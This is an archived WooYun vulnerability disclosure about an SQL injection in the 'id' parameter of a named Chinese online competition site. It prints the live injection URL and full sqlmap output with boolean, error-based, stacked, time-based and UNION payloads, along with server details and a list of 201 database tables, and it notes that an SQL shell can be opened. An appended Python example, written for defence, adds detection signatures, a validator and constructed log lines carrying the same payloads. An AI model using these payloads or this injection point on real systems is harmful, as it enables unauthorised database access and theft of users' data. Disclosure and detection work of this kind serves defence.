WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-04-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2016-05-26: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
全民竞赛网 (Quanmin Jingsai Wang, "National Competition Network") is an online competition platform through which governments, enterprises, public institutions and schools publicise and popularise knowledge to the public.
1. 全民竞赛网 has a SQL injection. Injection point: http://www.chinese-js.com/NewsDetail.aspx?id=105192
2. sqlmap verification:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=105192 AND 3822=3822

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=105192 AND 2609=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2609=2609) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3735=3735) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=105192;WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=105192 WAITFOR DELAY '0:0:5'

    Type: UNION query
    Title: Generic UNION query (NULL) - 18 columns
    Payload: id=105192 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(106)+CHAR(72)+CHAR(121)+CHAR(121)+CHAR(104)+CHAR(89)+CHAR(68)+CHAR(97)+CHAR(108)+CHAR(77)+CHAR(111)+CHAR(71)+CHAR(109)+CHAR(121)+CHAR(70)+CHAR(80)+CHAR(77)+CHAR(115)+CHAR(102)+CHAR(100)+CHAR(116)+CHAR(75)+CHAR(119)+CHAR(72)+CHAR(67)+CHAR(109)+CHAR(122)+CHAR(99)+CHAR(116)+CHAR(117)+CHAR(102)+CHAR(117)+CHAR(102)+CHAR(106)+CHAR(84)+CHAR(122)+CHAR(104)+CHAR(108)+CHAR(109)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[21:53:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
3. Enumerated 8 databases.
4. The current database is 123js; enumerated 201 tables:
Database: 123js
[201 tables]
+-------------------------------------+
| City |
| CloudService |
| Competition_temp |
| LinkCN1 |
| LinkCN1 |
| Picture |
| Province |
| View_BranchScore |
| View_Competition_Users |
| View_Question |
| View_tblAdUser |
| View_tblAddMoneyRecord |
| View_tblArticle |
| View_tblCompPrice |
| View_tblCompPrjEvaluation |
| View_tblCompPrjUserComment |
| View_tblCompProject |
| View_tblCompType2 |
| View_tblCompType3 |
| View_tblCreateCompRecord |
| View_tblDS_Branch |
| View_tblDS_Competition |
| View_tblDS_TestStock |
| View_tblDS_UserExamResult |
| View_tblDS_Users |
| View_tblDataDownload |
| View_tblMember |
| View_tblOrder |
| View_tblResearchRecord |
| View_tblSetMealOrder |
| View_tblShareExperience |
| View_tblSuccessfulCase_New |
| View_tblSuccessfulCase_New |
| View_tblSysUser |
| View_tblWeinxin_Huodong |
| View_tblWeinxin_PrizeUser |
| View_tblWeixin_DatiDetail |
| View_tblWeixin_Users |
| View_tblWenda |
| ceshi |
| comd_list |
| t_jiaozhu |
| tata |
| tblAboutUs |
| tblAdUser |
| tblAddMoneyRecord |
| tblArea |
| tblArticle1 |
| tblArticle1 |
| tblArticleHistory |
| tblArticleRemark |
| tblArticleRemarkReport |
| tblArticleType |
| tblAskForAgent |
| tblBlackList_IP |
| tblBlackList_OpenId |
| tblBranchCode |
| tblCarbonFootprint |
| tblCardNo |
| tblCityIP |
| tblCommendAreaInfo |
| tblCommendAreaInfo |
| tblCommendNews |
| tblCompMode |
| tblCompPrice |
| tblCompPrjEvaluation |
| tblCompPrjUserComment |
| tblCompProject |
| tblCompSetMeal |
| tblCompType1 |
| tblCompType1 |
| tblCompType2 |
| tblCompType3 |
| tblCompUserGroup |
| tblCounty |
| tblCreateCompRecord |
| tblDP_CommentProd |
| tblDP_Company |
| tblDP_ProdType1 |
| tblDP_ProdType2 |
| tblDP_ProductInfo |
| tblDS_Advice |
| tblDS_Age |
| tblDS_Area |
| tblDS_Baoming |
| tblDS_Branch |
| tblDS_CommendBBS |
| tblDS_CommendInfo |
| tblDS_CompSolution |
| tblDS_CompetitionAd_Temp |
| tblDS_CompetitionAd_Temp |
| tblDS_CompetitionAd_Temp |
| tblDS_CompetitionPoint |
| tblDS_CompetitionQuestion |
| tblDS_CompetitionType |
| tblDS_Identity |
| tblDS_Industry |
| tblDS_JiYu |
| tblDS_Log |
| tblDS_Neighborhood |
| tblDS_Pic |
| tblDS_PrizeBill_Branch |
| tblDS_PrizeBill_Person |
| tblDS_Street |
| tblDS_TestStockDesc |
| tblDS_TestStockModel |
| tblDS_TestStock_temp |
| tblDS_TestStock_temp |
| tblDS_UserExamResult_Temp |
| tblDS_UserExamResult_Temp |
| tblDS_Users_Temp |
| tblDS_Users_sj_full1 |
| tblDS_Users_sj_full1 |
| tblDS_Work |
| tblDataDownload |
| tblDataDownloadType |
| tblDirect |
| tblFPN_Mutuality |
| tblFriendLink |
| tblFrontPageNews |
| tblFrontPageNewsType |
| tblGetNewsLOG |
| tblGrade |
| tblHomeCommend1 |
| tblHomeCommend1 |
| tblHotNews |
| tblKeyWords |
| tblLeaveWord |
| tblLoginLog |
| tblMember_temp |
| tblMember_temp |
| tblMobile_TestStockScore1 |
| tblMode |
| tblNewsSource1 |
| tblNewsSource1 |
| tblObjective |
| tblOrder |
| tblPhotoVoteActiveLeaveWord |
| tblPhotoVoteActiveLeaveWord |
| tblPhotoVoteDetail |
| tblPhotoVoteInfo |
| tblPhotoVote_PrizeItem |
| tblPhotoVote_PrizeUser |
| tblPicNews |
| tblPicNewsType |
| tblProductInfo |
| tblResearchDetail |
| tblResearchDetail |
| tblResearchRecord |
| tblRight |
| tblRole |
| tblRoleRight |
| tblSetMealOrder |
| tblShareExperience |
| tblSite |
| tblSpecial_Xihui |
| tblSpiderSource |
| tblSuccessfulCaseType |
| tblSuccessfulCase_New |
| tblSuccessfulCase_New |
| tblSunVoteComp |
| tblSunVoteComp |
| tblSunVoteTestStock |
| tblSunVoteUserExamResult |
| tblSunVoteUsers |
| tblSysUser |
| tblTempComp |
| tblTestRandom |
| tblTestRandomType_8 |
| tblTestRandomType_8 |
| tblUnionids |
| tblUserWorks |
| tblUsers |
| tblVisitRecord_cut |
| tblVisitRecord_cut |
| tblVoteActive |
| tblVoteDetail |
| tblVoteInfo |
| tblVoteItem不用 |
| tblVote不用 |
| tblWeinxin_HuodongMode |
| tblWeinxin_HuodongMode |
| tblWeinxin_HuodongPlan |
| tblWeinxin_PrizeItem |
| tblWeinxin_PrizeUser |
| tblWeinxin_RedPacketTotalDetailPlan |
| tblWeinxin_RedPacketTotalDetailPlan |
| tblWeinxin_RedPacketUser |
| tblWeixin_DatiDetail |
| tblWeixin_DatiDetail |
| tblWeixin_Shiti |
| tblWeixin_Users |
| tblWenda |
| tblWendaType |
| tblWhiteList_IP |
| tblWhiteList_OpenId |
| tblWorksMessageBoard |
| tblWorksNotice |
| tet |
| xx |
| 查询 |
+-------------------------------------+
5. --sql-shell can be used to open a SQL shell and operate on the database.
As above.
Guard against injection.
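The sqlmap output above names six technique families against the single `id` parameter, and the only remedy the report gives is "guard against injection". The following script is an added example, not code from the report or from the vendor: it shows what that guard looks like at the input boundary (the `id` of NewsDetail.aspx must be a plain integer, so every payload in the report is rejected before any SQL is built) and how the same payload shapes are spotted in IIS access logs after the fact. It assumes IIS 6.0 W3C logs in the default field order (date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status ...); the log excerpt, client addresses and user agents are constructed for the example.

```python
"""Defender-side helpers for the NewsDetail.aspx?id= injection in this report.

Added example, not code from the report or from the vendor. Assumes IIS 6.0
W3C logs in the default field order (date time s-ip cs-method cs-uri-stem
cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status ...) and that
'id' is meant to be a plain integer. The log lines below are constructed.
"""
import re
from urllib.parse import unquote_plus

# One signature per technique family that sqlmap confirmed in the report.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+\b", re.I),
    "error-based":         re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I),
    "inline query":        re.compile(r"^\s*\(\s*SELECT\b", re.I),
    "stacked queries":     re.compile(r";\s*(WAITFOR|SELECT|INSERT|UPDATE|DELETE|EXEC|DROP)\b", re.I),
    "time-based blind":    re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "UNION query":         re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}


def classify_value(value: str) -> list:
    """Return the technique families whose signature matches a decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def parse_news_id(value: str):
    """Input-boundary fix: accept only a plain integer id, else None.

    Every payload in the report fails this check, so none reaches the SQL layer.
    The value returned here is what should be bound as a typed SQL parameter."""
    text = value.strip()
    return int(text) if re.fullmatch(r"\d{1,10}", text) else None


def query_params(raw_query: str):
    """Split an IIS cs-uri-query field into (name, decoded value) pairs.

    Only '&' separates pairs; ';' stays inside the value because it is part of
    the stacked-queries payload. IIS writes '-' for an empty query string."""
    if raw_query == "-":
        return
    for pair in raw_query.split("&"):
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def scan_iis_log(lines, param="id"):
    """Return (client_ip, uri_stem, techniques) for every request whose
    parameter value matches at least one signature."""
    hits = []
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue  # directive or blank line
        fields = line.split()
        if len(fields) < 9:
            continue  # not a full W3C record
        stem, query, client = fields[4], fields[5], fields[8]
        for name, value in query_params(query):
            if name == param:
                techniques = classify_value(value)
                if techniques:
                    hits.append((client, stem, techniques))
    return hits


# Constructed IIS log excerpt: one normal request followed by three requests
# that carry payload shapes from the sqlmap output in the report.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2016-04-11 21:53:40 10.0.0.5 GET /NewsDetail.aspx id=105192 80 - 192.0.2.10 Mozilla/5.0 200 0 0
2016-04-11 21:53:50 10.0.0.5 GET /NewsDetail.aspx id=105192%20AND%203822=3822 80 - 192.0.2.10 sqlmap/1.0 200 0 0
2016-04-11 21:53:51 10.0.0.5 GET /NewsDetail.aspx id=105192;WAITFOR%20DELAY%20'0:0:5'-- 80 - 192.0.2.10 sqlmap/1.0 200 0 0
2016-04-11 21:53:57 10.0.0.5 GET /NewsDetail.aspx id=105192%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(113)%2BCHAR(118),NULL-- 80 - 192.0.2.10 sqlmap/1.0 200 0 0
""".splitlines()

if __name__ == "__main__":
    for client, stem, techniques in scan_iis_log(SAMPLE_LOG):
        print(f"{client} {stem}: {', '.join(techniques)}")
    for raw in ("105192", "105192 AND 3822=3822"):
        print(repr(raw), "->", parse_news_id(raw))
```

The log scan is a triage aid, not a control: signatures of this kind are easy to vary, and the page's own output shows sqlmap already encodes its marker strings as `CHAR()` concatenations. The control is `parse_news_id` applied before the query is built, with the resulting integer bound as a typed parameter (in ASP.NET, a `SqlParameter` on the `SqlCommand`) rather than concatenated into the statement; string concatenation is what lets a value like `105192;WAITFOR DELAY '0:0:5'--` become a second statement.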
Could not reach the vendor, or the vendor actively declined.
Vulnerability Rank: 15 (WooYun rating)